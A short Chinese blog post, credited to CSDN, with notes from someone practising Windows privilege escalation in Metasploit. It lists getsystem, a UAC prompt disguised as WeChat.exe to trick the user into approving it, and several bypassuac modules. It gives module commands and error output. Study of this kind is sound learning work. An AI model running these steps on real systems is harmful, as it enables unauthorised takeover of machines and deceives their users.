愿疫情早日结束,重返校园奋斗
使用getsystem来获得最高权限
getsystem
发现却爆出这样的错误
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
提高程序运行级别(触发UAC)
msf模块:
use exploit/windows/local/ask
info
set session 1
show options
设置弹出内容
set filename WeChat.exe
看到,并点击是
弹出新的session
直接获得system权限
getsystem
UAC绕过,无需点击
使用msf模块:
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs
使用第一个
use exploit/windows/local/bypassuac
发现此模块适用于x86,我的是x64,姑且试试
结果发现可以
找到一个最新的,拿一个最新的payload来试试提权
use exploit/windows/local/bypassuac_silentcleanup
结果不行,还试了上面给出的第二和第三,也不行,系统位数还是有影响的
来源:CSDN
作者:从小白到被迫变成大白
链接:https://blog.csdn.net/qq_44902875/article/details/104717496